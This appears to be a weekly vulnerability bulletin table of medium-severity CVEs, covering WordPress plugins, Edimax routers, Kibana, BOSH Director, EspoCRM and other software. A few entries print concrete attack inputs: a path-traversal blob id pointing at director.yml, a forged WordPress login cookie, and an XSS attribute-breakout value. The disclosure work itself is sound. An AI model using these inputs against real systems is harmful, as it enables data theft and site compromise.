| Cloud Foundry Foundation--BOSH Director | When the director sends a long-running request (e.g. compile_package), the agent's reply JSON is consumed by AgentClient. inject_compile_log (line 332-339) reads response['value']['result']['compile_log_id'] and format_exception (line 318-325) reads exception['blobstore_id']; both pass the agent-supplied string unmodified to download_and_delete_blob(blob_id) (line 344-349), which calls @resource_manager.get_resource(blob_id) and, in an ensure block, @resource_manager.delete_resource(blob_id). Api::ResourceManager forwards the id straight to blobstore.get(id) / blobstore.delete(id). When the director is configured with the local blobstore provider, Blobstore::LocalClient#object_file_path(oid) is File.join(@blobstore_path, oid) (local_client.rb:54-56) with no normalisation, so oid = "../../jobs/director/config/director.yml" resolves outside the blobstore root. Affected versions: BOSH Director: All versions prior to v282.1.12 | 2026-05-27 | 5.8 | CVE-2026-41009 |
| Cloud Foundry Foundation--BOSH Director | AgentClient#handle_method (lines 264-303) processes every NATS reply. It calls inject_compile_log (line 273) on every response, which reads response['value']['result']['compile_log_id'] (line 332-338) and passes it to download_and_delete_blob. Separately, any response containing 'exception' goes through format_exception (lines 308-325), which reads exception['blobstore_id'] and also calls download_and_delete_blob. That helper (lines 344-349) calls ResourceManager#get_resource(blob_id) and, in an ensure block, ResourceManager#delete_resource(blob_id). ResourceManager (resource_manager.rb:62-70) calls blobstore.delete(id) on the single shared Director blobstore with no UUID-format check, no ownership check, and no namespace prefix. Affected versions: BOSH Director: All versions prior to v282.1.12 | 2026-05-27 | 5 | CVE-2026-41704 |
| cloudways--Breeze Cache | The Breeze plugin for WordPress is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor in all versions up to, and including, 2.5.2 This is due to improper verification of the `wordpress_logged_in_` cookie in the `inc/cache/execute-cache.php` file when the "Cache Logged-in Users" setting is enabled. The plugin parses the username directly from the cookie value (e.g., `username|hash`) using `substr()` to retrieve the corresponding cache file but fails to verify the session's cryptographic signature or validity with WordPress core. This makes it possible for unauthenticated attackers to supply a crafted cookie (e.g., `wordpress_logged_in_fake=admin|fake`) to trick the plugin into serving the cached HTML content generated for an administrator, leading to the disclosure of sensitive information such as private posts (including their full content), the Admin Bar, WordPress nonces, and other data visible only to logged-in administrators or other users. | 2026-05-29 | 5.3 | CVE-2026-2128 |
| code-projects--Employee Management System | A vulnerability was identified in code-projects Employee Management System 1.0. This impacts an unknown function of the file /changepassemp.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-25 | 6.3 | CVE-2026-9449 |
| code-projects--Employee Management System | A security flaw has been discovered in code-projects Employee Management System 1.0. Affected is an unknown function of the file /psubmit.php. The manipulation of the argument pid results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9450 |
| code-projects--Employee Management System | A weakness has been identified in code-projects Employee Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /process/applyleaveprocess.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9451 |
| code-projects--Employee Management System | A weakness has been identified in code-projects Employee Management System 1.0. This affects an unknown function of the file /eloginwel.php. This manipulation of the argument ID causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 4.3 | CVE-2026-9415 |
| code-projects--Employee Management System | A security vulnerability has been detected in code-projects Employee Management System 1.0. This impacts an unknown function of the file /myprofile.php. Such manipulation of the argument ID leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-05-25 | 4.3 | CVE-2026-9416 |
| code-projects--Employee Management System | A vulnerability was detected in code-projects Employee Management System 1.0. Affected is an unknown function of the file /myprofileup.php. Performing a manipulation of the argument ID results in cross site scripting. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-05-25 | 4.3 | CVE-2026-9417 |
| code-projects--Employee Management System | A flaw has been found in code-projects Employee Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /changepassemp.php. Executing a manipulation of the argument ID can lead to cross site scripting. The attack may be performed from remote. The exploit has been published and may be used. | 2026-05-25 | 4.3 | CVE-2026-9418 |
| code-projects--Employee Management System | A vulnerability has been found in code-projects Employee Management System 1.0. Affected by this issue is some unknown functionality of the file /empproject.php. The manipulation of the argument ID leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 4.3 | CVE-2026-9419 |
| code-projects--Employee Management System | A vulnerability was determined in code-projects Employee Management System 1.0. This affects an unknown function of the file /applyleave.php. Executing a manipulation of the argument ID can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 4.3 | CVE-2026-9448 |
| code-projects--Online Music Site | A vulnerability has been found in code-projects Online Music Site 1.0. This affects an unknown part of the file /Administrator/PHP/AdminUpdateAlbum.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-05-31 | 4.7 | CVE-2026-10171 |
| code-projects--Visitor Management System | A flaw has been found in code-projects Visitor Management System 1.0. Affected by this issue is some unknown functionality of the file /vms/php/phone_0.php. This manipulation of the argument phone causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-05-31 | 6.3 | CVE-2026-10170 |
| CodeAstro--Leave Management System | A weakness has been identified in CodeAstro Leave Management System 1.0. The affected element is an unknown function of the file /admin/add_staff.php. Executing a manipulation of the argument email_id can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-26 | 6.3 | CVE-2026-9542 |
| codycave--Endless Scroll | The Endless Scroll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8703 |
| Convers Lab--WPSubscription | Cross-Site Request Forgery (CSRF) vulnerability in Convers Lab WPSubscription allows Cross Site Request Forgery. This issue affects WPSubscription: from n/a through 1.9.1. | 2026-05-25 | 4.3 | CVE-2026-24554 |
| Cornel Raiu--WP Search Analytics | Missing Authorization vulnerability in Cornel Raiu WP Search Analytics allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Search Analytics: from n/a before 1.5.0. | 2026-05-25 | 5.3 | CVE-2026-27357 |
| creativemindssolutions--CM Ad Changer A simple tool to control and optimize your site's banners | The CM Ad Changer - A simple tool to control and optimize your site's banners plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.7. This is due to missing or incorrect nonce validation on the cmac_campaigns_action function. This makes it possible for unauthenticated attackers to permanently delete arbitrary advertising campaigns, including their associated banner records and uploaded files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-9236 |
| creaweb2b--Simple Divi Shortcode | The Simple Divi Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the [showmodule] shortcode in versions up to, and including, 1.2 This is due to insufficient input sanitization and output escaping in the showmodule_shortcode() function, which concatenates the 'id' shortcode attribute directly into a dynamically constructed shortcode string without applying esc_attr() or any escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 6.4 | CVE-2026-9714 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.6.11.8 due to the plugin not properly verifying that a user is authorized to perform an action via the bulk appointments REST API endpoint. This makes it possible for unauthenticated attackers to modify arbitrary appointment records including customer PII, payment status, and meeting URL fields, and to expose full customer PII from existing appointment records via the bulk endpoint response. The public nonce is a static, user-independent value present in the HTML source of any page hosting the [ssa_booking] shortcode, meaning any visitor who has viewed such a page can obtain it and target any appointment in the system without authentication. | 2026-05-28 | 5.3 | CVE-2026-6937 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to denial of service in all versions up to, and including, 1.6.11.5. This is due to a publicly accessible REST API endpoint (/wp-json/ssa/v1/async) that calls PHP's sleep() function on a user-supplied delay parameter without any rate limiting. This makes it possible for unauthenticated attackers to exhaust PHP worker processes, denying access to the site to legitimate users. | 2026-05-27 | 5.3 | CVE-2026-7493 |
| cryptoprijzen--Cryptocurrency Prijsvergelijking Widget | The Cryptocurrency Prijsvergelijking Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting in version 1.0. This is due to insufficient output escaping in the as_get_coin_shortcode() function, which renders the 'width' (and 'height') shortcode attribute directly into the style attribute of an <iframe> element without applying any escaping function such as esc_attr(). An attacker-controlled value like '100px;"onload="alert(1)" x="' terminates the style attribute prematurely and injects an arbitrary HTML attribute into the iframe tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8698 |
| cuamckuy--Easy Prism Syntax Highlighter | The Easy Prism Syntax Highlighter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'code' (and 'c') shortcode in versions up to, and including, 1.0.2. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes in the shortcode() function, which concatenates the first positional attribute directly into the class attribute of the generated <pre>/<code> HTML without calling esc_attr() or any other escaping function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8875 |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.13.19. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to expose sensitive plugin configuration data, including Google Maps API keys and GeoNames service credentials, to unauthenticated attackers. | 2026-05-28 | 5.3 | CVE-2026-7552 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.3, the workflow telemetry sanitizer could retain partial fragments of URL-shaped node parameters before sending workflow data to the project's anonymous telemetry backend. Values placed in HTTP-Request-style node parameters - such as customer or tenant identifiers, short secrets embedded in query strings, and signed request parameters - could therefore appear in stored telemetry, contrary to the collection boundary documented in PRIVACY.md. This vulnerability is fixed in 2.51.3. | 2026-05-29 | 6.5 | CVE-2026-45582 |
| DALIBO--PostgreSQL Anonymizer | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a table and placing malicious code inside a column identifier. If a superuser calls the k-anonymity function, the malicious code is executed with superuser privileges. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreSQL 15 and later, the creation permission on the public schema is revoked by default and this exploit can only be achieved by a user who was explicitly granted the CREATE TABLE privilege. The problem is resolved in PostgreSQL Anonymizer 3.1.0 and further versions | 2026-05-27 | 6.8 | CVE-2026-9617 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | The administrator account for the Danelec MacGregor Voyage Data Recorder web interface can directly edit sensitive files related to authentication, potentially changing the root password. | 2026-05-29 | 5.7 | CVE-2026-40425 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | An authenticated user can download a backup of the Danelec MacGregor Voyage Data Recorder device which includes account data and password hashes. | 2026-05-29 | 5.4 | CVE-2026-42951 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | Danelec MacGregor Voyage Data Recorder passwords are stored with a hashing method which limits password length and is susceptible to brute force attacks. | 2026-05-29 | 5.4 | CVE-2026-44611 |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. From 2.6.0 to 2.9.0, GuardDog includes attacker-controlled filenames, file locations, messages, and code snippets in its default human-readable output without escaping terminal control characters. A malicious package can therefore inject ANSI or OSC escape sequences into analyst terminals or CI logs. | 2026-05-27 | 5 | CVE-2026-44972 |
| dattateccom--EnvaloSimple: Email Marketing y Newsletters | The EnvÃaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-27 | 4.9 | CVE-2026-7618 |
| davidanderson--Easy Updates Manager | The Easy Updates Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'paged' parameter in versions up to, and including, 9.0.20 This is due to insufficient input sanitization and output escaping in the pagination() function. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page granted they can trick an administrator into performing an action such as clicking on a link. | 2026-05-28 | 6.1 | CVE-2026-7660 |
| dazeb--cline-mcp-memory-bank | A security flaw has been discovered in dazeb cline-mcp-memory-bank up to 55c81b9cf6c16700983c84dc4cdea3cafa19a75f. The affected element is the function handleInitializeMemoryBank of the file src/index.ts. The manipulation of the argument projectPath results in path traversal. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 6.3 | CVE-2026-9468 |
| dazeb--markdown-downloader | A flaw has been found in dazeb markdown-downloader up to 3d4394b34b6c99d81af817623af55e3384df5a6a. Affected is the function download_markdown/list_downloaded_files/create_subdirectory of the file src/index.ts. Executing a manipulation can lead to path traversal. The attack can be launched remotely. The exploit has been published and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 6.3 | CVE-2026-9472 |
| DearHive--DearFlip | Missing Authorization vulnerability in DearHive DearFlip allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects DearFlip: from n/a through 2.4.27. | 2026-05-27 | 4.3 | CVE-2026-49047 |
| debugmcp--mcp-debugger | A vulnerability was identified in debugmcp mcp-debugger up to 0.20.0. Impacted is the function handleGetSourceContext of the file src/server.ts. The manipulation leads to path traversal. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.3 | CVE-2026-9467 |
| devitemsllc--ShopLentor All-in-One WooCommerce Growth & Store Enhancement Plugin | The ShopLentor - WooCommerce Builder for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blockUniqId' block attribute in multiple Product Gride blocks in versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 5.4 | CVE-2026-6287 |
| dkjensen--Splide Carousel Block | The Splide Carousel Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'url' Block Attribute in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload must be published before it executes for site visitors, which requires an editor or administrator to approve and publish the contributor's post. | 2026-05-27 | 6.4 | CVE-2026-9022 |
| Dolibarr--ERP CRM | A vulnerability has been found in Dolibarr ERP CRM 23.0.0/23.0.1/23.0.2. The affected element is an unknown function of the file htdocs/user/messaging.php. Such manipulation of the argument ID leads to authorization bypass. The attack can be executed remotely. Upgrading to version 23.0.3 is sufficient to fix this issue. The name of the patch is 119b3606c7a701747a57a1f18b1a9e7666f678e2. It is suggested to upgrade the affected component. | 2026-05-30 | 4.3 | CVE-2026-10154 |
| Dromara--lamp-cloud | A vulnerability has been found in Dromara lamp-cloud up to 5.6.2. Impacted is the function GroovyClassLoader.parseClass of the component Message Template Handler. Such manipulation of the argument DefMsgTemplate.content leads to improper neutralization of special elements used in a template engine. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9498 |
| DTStack--Taier | A vulnerability has been found in DTStack Taier 1.4.0. This affects the function Runtime.exec of the component REST API. The manipulation of the argument sqlText leads to os command injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9437 |
| Dylan Kuhn--Geo Mashup | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dylan Kuhn Geo Mashup allows Stored XSS. This issue affects Geo Mashup: from n/a through 1.13.18. | 2026-05-26 | 6.5 | CVE-2026-27427 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.4, a Broken Access Control vulnerability exists in the application, allowing an unauthorized authenticated user to edit comments posted by others. This stems from inadequate server-side access control validation, where the application depends only on a predictable identifier in the request to determine which comment to edit, without confirming the requesting user's ownership of the comment. This vulnerability is fixed in 2.3.4. | 2026-05-26 | 6.5 | CVE-2026-43934 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.5, e107 CMS does not properly enforce CSRF token validation on comment moderation actions. The problem comes down to how session_handler::check() handles CSRF tokens. Instead of requiring a token on every state-changing request, it only validates the token if one happens to be present. If there is no token at all, the check is skipped entirely. This vulnerability is fixed in 2.3.5. | 2026-05-26 | 6.5 | CVE-2026-46620 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.4, you can access the local environment by specifying the URL of the local environment from "Image/File URL:" of "From a remote location" in "Media Manager" on the administrator screen. This vulnerability is fixed in 2.3.4. | 2026-05-26 | 4.3 | CVE-2026-43936 |
| Edimax--BR-6478AC | A weakness has been identified in Edimax BR-6478AC 1.23. This affects the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component POST Request Handler. This manipulation of the argument rootAPmac causes command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-30 | 6.3 | CVE-2026-10127 |
| Edimax--BR-6478AC | A vulnerability was determined in Edimax BR-6478AC 1.23. The affected element is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. This manipulation of the argument rootAPmac causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-31 | 6.3 | CVE-2026-10166 |
| Edimax--BR-6478AC | A vulnerability was identified in Edimax BR-6478AC 1.23. Affected by this vulnerability is the function formAccept of the file /goform/formAccept of the component POST Request Handler. Such manipulation of the argument submit-url leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9440 |
| Edimax--BR-6478AC | A security flaw has been discovered in Edimax BR-6478AC 1.23. Affected by this issue is the function formiNICbasic of the file /goform/formiNICbasic of the component POST Request Handler. Performing a manipulation of the argument rootAPmac results in command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9441 |
| Edimax--BR-6675nD | A vulnerability was determined in Edimax BR-6675nD 1.12. Affected is the function stainfo of the file /goform/stainfo. This manipulation of the argument interface causes command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9439 |
| Edimax--BR-6675nD | A security flaw has been discovered in Edimax BR-6675nD 1.12. Impacted is the function mp of the file /goform/mp of the component POST Request Handler. Performing a manipulation of the argument command results in command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.7 | CVE-2026-9423 |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.31. The affected element is the function formWlanMP of the file /goform/formWlanMP of the component Content-Type Handler. Executing a manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9424 |
| ektorcaba--WP Iframe Geo Style for Amazon affiliates | The WP Iframe Geo Style for Amazon affiliates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'adid' Shortcode Attribute in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8837 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to a denial of service via Excessive Allocation (CAPEC-130). An authenticated user holding a low-privileged role can submit a specially crafted, oversized payload to an internal Kibana API, causing the Kibana process to exhaust available resources and become unresponsive to all users until the service recovers or is restarted. | 2026-05-28 | 6.5 | CVE-2026-33464 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated low-privileged user can cause Kibana to consume exponentially increasing amounts of memory by submitting a specially crafted Timelion visualization expression containing deeply chained function calls. The resulting data structure grows without bound, exhausting available memory and causing the Kibana service to crash and become unavailable to all users. | 2026-05-28 | 6.5 | CVE-2026-42399 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user can send a specially crafted compressed request payload that is processed prior to authorization checks, causing excessive memory and CPU resource consumption that can result in a Kibana instance becoming unresponsive or crashing. | 2026-05-28 | 6.5 | CVE-2026-42400 |
| Elastic--Kibana | Server-Side Request Forgery (CWE-918) in Kibana can allow an authenticated user with connector management privileges to bypass the operator-configured connector allowlist, causing the Kibana server to issue outbound requests to destinations the egress controls were intended to block. | 2026-05-28 | 6.3 | CVE-2026-49093 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to denial of service via Excessive Allocation (CAPEC-130). An authenticated user with viewer-level access can submit a request containing an oversized input value to an analytics collections management endpoint. Kibana will consume excessive CPU and memory resources while processing the request. This results in Kibana becoming unavailable to all users until the service is manually recovered. | 2026-05-28 | 6.5 | CVE-2026-49094 |
| Elastic--Kibana | Operation on a Resource after Expiration or Termination (CWE-672) in Kibana can lead to unauthorized information disclosure. A logic error in how expiration timestamps were validated allowed a time-bounded access token to remain usable beyond its intended validity window, enabling an unauthenticated actor in possession of the token to retrieve the associated content after expiration. | 2026-05-28 | 5.3 | CVE-2026-33463 |
| Elastic--Kibana | A path traversal vulnerability was identified in Kibana's dashboard management functionality. An authenticated user with limited permissions could create a dashboard with a specially crafted identifier. When an administrator subsequently attempts to delete this dashboard through the Kibana interface, the deletion request is redirected to an unintended internal endpoint, potentially resulting in the unauthorized deletion of user accounts or other resources. Exploitation requires an administrator to perform a delete action on the maliciously crafted dashboard object. | 2026-05-28 | 4.6 | CVE-2026-33462 |
| Elastic--Kibana | Improper Neutralization of Input During Web Page Generation (CWE-79) in Kibana can lead to stored HTML injection. A user with write access to an Elasticsearch index could persist crafted markup which, when subsequently rendered through an affected Kibana view by another user, was not sufficiently sanitized. Successful exploitation could result in unauthorized UI manipulation and outbound network requests issued from the viewing user's browser session. | 2026-05-28 | 4.1 | CVE-2026-42401 |
| eldougo--Tuxquote | The Tuxquote plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'TUXQUOTE' shortcode in versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on user supplied attributes ('title', 'align', and 'width') in the tuxquote_build_format() function, which are concatenated into the rendered HTML without being passed through esc_attr() or esc_html(). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8846 |
| ellanetworks--core | Ella Core is a 5G core designed for private networks. Prior to 1.10.0, Ella Core does not verify the UE Security Capabilities received in NGAP PathSwitchRequest messages against its locally stored values. A malicious gNB can overwrite Ella Core's stored UE security capabilities for any UE with arbitrary values by sending a single crafted PathSwitchRequest. This vulnerability is fixed in 1.10.0. | 2026-05-27 | 6.1 | CVE-2026-44475 |
| equalizedigital--Equalize Digital Accessibility Checker WCAG, ADA, EAA and Section 508 compliance | The Equalize Digital Accessibility Checker - WCAG, ADA, EAA and Section 508 compliance plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.42.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the ignore state, ignore reason, and ignore comment of arbitrary accessibility issues across the entire site - including mass modification of all rows sharing an 'object' identifier when largeBatch=true is supplied - corrupting accessibility audit integrity by hiding or dismissing findings outside their authorization scope. | 2026-05-28 | 4.3 | CVE-2026-9015 |
| esiteq--Responsive Video Embedder | The Responsive Video Embedder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rem_video' shortcode in versions up to, and including, 0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes (notably 'id' and 'list') in the video_shortcode() function, which are concatenated directly into an HTML iframe's src attribute without escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8877 |
| espocrm--espocrm | EspoCRM is an open source customer relationship management application. Prior to 9.3.5, the POST /api/v1/EmailTemplate/:id/prepare endpoint accepts an emailAddress parameter and resolves the owning entity (Contact, Lead, Account, or User) without performing an ACL check. An authenticated user with EmailTemplate read permission can extract all field values of any entity by supplying the target's email address, bypassing read: own or read: team ACL restrictions. This vulnerability is fixed in 9.3.5. | 2026-05-28 | 6.5 | CVE-2026-41141 |
| espocrm--espocrm | EspoCRM is an open source customer relationship management application. Prior to 9.3.5, a business logic flaw (Broken Access Control) in EspoCRM 9.3.3 allows low-privileged users to pin arbitrary notes without having the required edit permissions for the parent object. Due to a "write first, authorize later" execution flaw in the backend API, even though the server correctly returns a 403 Forbidden error, the targeted note's pinned status is already persistently modified in the database. The root cause lies in the server-side processing of the POST /api/v1/Note/{id}/pin endpoint. In application/Espo/Tools/Stream/Api/PostNotePin.php, the process() method first calls getNote($id) before calling checkParent($note). This vulnerability is fixed in 9.3.5. | 2026-05-28 | 4.3 | CVE-2026-41160 |
| Exim--Exim | Exim 4.88 before 4.99.4, in some proxy configurations, mishandles certain short payloads, leading to disclosure of uninitialized stack memory values to a client. | 2026-05-30 | 5.3 | CVE-2026-48840 |
| Extreme Networks--Extreme Platform ONE | A race condition in the shared Extreme Platform ONE IAM Gateway API-key authentication path could, under specific high-concurrency traffic conditions, intermittently allow requests authenticated with an Extreme Platform ONE /IAM-issued API key to receive response data for another tenant. The issue was observed through ExtremeCloud IQ/XIQ API endpoints and validated against both XIQ/XAPI and Extreme Platform ONE /Common Services API paths. XIQ-native tokens and standard OAuth/Bearer JWT authentication were not affected. | 2026-05-29 | 6.3 | CVE-2026-9831 |
| Facebook--Facebook for WooCommerce | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Facebook Facebook for WooCommerce allows Phishing. This issue affects Facebook for WooCommerce: from n/a through 3.7.0. | 2026-05-27 | 4.7 | CVE-2026-49059 |
| fides-it--Animate Your Content | The Animate Your Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'animation-set' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user supplied attributes in the shortcode_args_to_html_attrs() function, which concatenates shortcode attribute values directly into double-quoted HTML attributes without calling esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8872 |
| fides-it--Post Categories Gallery | The Post Category Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'postcategorygallery' shortcode in versions up to, and including, 1.0.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes (such as total_width, color_scheme, and caption_font_size) inside the sc_horcatbar() function, which are concatenated directly into HTML attribute values. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8867 |
| frappe--hrms | Frappe HR is an open-source human resources management solution (HRMS). Prior to 16.5.0, authenticated employees could access other employees' leave details due to improper authorization checks. This vulnerability is fixed in 16.5.0. | 2026-05-27 | 6.5 | CVE-2026-45081 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the AMF in Free5GC does not verify the UE Security Capabilities received in NGAP PathSwitchRequest messages against its locally stored values, as mandated by 3GPP TS 33.501 §6.7.3.1. A malicious gNB can overwrite the AMF's stored UE security capabilities with arbitrary values, which are then propagated in PathSwitchRequest Acknowledge messages and subsequent Handover Request messages. This leads to persistent handover denial-of-service for affected UEs. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 6.1 | CVE-2026-42081 |
